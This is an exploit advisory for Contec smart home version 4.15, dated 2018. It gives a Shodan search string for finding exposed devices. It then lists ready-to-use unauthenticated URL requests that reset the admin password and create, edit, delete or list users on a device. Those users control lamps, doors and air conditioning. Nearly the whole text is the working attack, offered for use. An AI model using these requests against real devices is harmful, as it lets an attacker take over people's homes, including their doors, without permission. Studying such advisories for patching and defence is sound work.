# Title : Contec smart home 4.15 Unauthorized Password Reset # Shodan Dork : "content/smarthome.php" # Vendor Homepage : http://contec.co.il # Tested on : Google Chrome # Tested version : 4.15 # Date : 2018-03-14 # Author : Z3ro0ne # Contact : saadousfar59@gmail.com # Facebook Page : https://www.facebook.com/Z3ro0ne # Vulnerability description : the Vulnerability allow unauthenticated attacker to remotely bypass authentication and change admin password without old password and control (lamps,doors,air conditioner...) # Exploit To Reset Admin password http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1 To Create a new user http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1 To edit a user http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1 To Delete a user http://Ipaddress:port/content/delete_user.php?user_name=USER Users list http://Ipaddress:port/content/user.php